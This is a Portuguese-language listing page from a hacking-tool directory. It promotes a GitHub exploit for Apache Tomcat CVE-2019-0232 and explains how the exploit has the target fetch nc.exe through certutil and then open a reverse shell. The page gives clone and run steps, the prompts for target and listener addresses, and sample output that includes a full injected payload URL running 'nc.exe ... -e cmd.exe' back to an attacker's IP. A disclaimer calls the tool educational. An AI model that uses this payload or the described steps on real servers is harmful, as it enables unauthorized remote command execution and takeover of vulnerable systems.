Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-0232 — Hi this is a revised and enhanced code for CVE-2019-0232 | Kitploit
Ferramentas/GitHubGitHub/dharan10/cve-2019-0232
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Hi this is a revised and enhanced code for CVE-2019-0232

Ver Repositório
22há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit para Apache Tomcat CVE-2019-0232

Este script explora a vulnerabilidade CVE-2019-0232 no Apache Tomcat, que permite execução remota de código através do tratamento inadequado do script ism.bat. O script utiliza uma técnica de reverse shell empregando certutil e nc.exe (Netcat) para obter acesso remoto ao sistema vulnerável.

Visão Geral da Vulnerabilidade:

  • CVE ID: CVE-2019-0232
  • Produtos Afetados: Apache Tomcat 6.x, 7.x, 8.x e 9.x
  • Descrição:
    • CVE-2019-0232 é uma vulnerabilidade no tratamento de requisições ao ism.bat do Apache Tomcat que pode permitir que atacantes executem comandos arbitrários no servidor. Esta vulnerabilidade ocorre devido à falta de validação adequada da entrada do usuário, permitindo que atacantes acionem a execução de comandos arbitrários através de uma requisição especialmente criada.
    • A vulnerabilidade pode ser explorada para baixar um arquivo nc.exe malicioso de um servidor remoto e usá-lo para gerar uma reverse shell.

Requisitos:

  • Python 3: O script é projetado para Python 3.x.
  • Netcat: Um listener Netcat (nc.exe) deve estar hospedado em um servidor para a conexão reverse shell.
  • Apache Tomcat: O servidor alvo deve estar executando uma versão vulnerável do Apache Tomcat (6.x, 7.x, 8.x ou 9.x) que seja suscetível ao CVE-2019-0232.

Como Funciona:

  1. Baixar nc.exe: O script envia uma requisição manipulada ao servidor Tomcat vulnerável para baixar o arquivo nc.exe (Netcat) para a máquina alvo usando certutil.
  2. Reverse Shell: Uma vez que o nc.exe é baixado, outra requisição é enviada para executar o comando reverse shell, que se conecta de volta ao listener Netcat do atacante.

Uso:

1. Clone o repositório:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Edite o script ou execute-o com entradas do usuário:

root@kitploit:~
python3 exploit.py

3. Será solicitado que você insira os seguintes detalhes:

root@kitploit:~
Target Host: O endereço IP do servidor Apache Tomcat a ser explorado.
Target Port: A porta do servidor alvo (padrão: 8080).
Server IP: O endereço IP do servidor que hospeda o nc.exe.
Server Port: O número da porta onde o nc.exe está hospedado (padrão: 80).
Netcat Listener IP: Seu endereço IP que receberá a reverse shell.
Netcat Listener Port: A porta na qual você está ouvindo a reverse shell.

Exemplo:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

Uma vez executado com sucesso, você deve ter uma conexão reverse shell de volta ao seu listener Netcat.

Aviso Legal:

Este script é destinado apenas para fins educacionais. Não o utilize para atividades maliciosas. Sempre obtenha a devida autorização antes de tentar qualquer teste de penetração ou auditoria de segurança. O uso indevido deste script pode resultar em consequências legais.

Notas Importantes:

Certifique-se de que o servidor Apache Tomcat não está corrigido contra o CVE-2019-0232 antes de usar este exploit. O script pode exigir privilégios administrativos dependendo da configuração do sistema alvo.

Autor:

A!Z3N(Dharan) Feito com poder!

Licença:

Este projeto está licenciado sob a Licença MIT.

No entanto, use por sua conta e risco. Este código é fornecido apenas para fins educacionais. Ao usar este código, você concorda em assumir total responsabilidade por quaisquer ações resultantes de seu uso. O uso indevido ou não autorizado deste exploit pode levar a consequências legais. Sempre obtenha a devida autorização antes de realizar qualquer teste de segurança ou teste de penetração em qualquer sistema.

Você é livre para usar, modificar e distribuir este código, mas apenas para fins éticos. O autor não é responsável por qualquer dano causado por este código.

Não use este exploit sem a permissão explícita do proprietário do sistema alvo.

Baixar ferramenta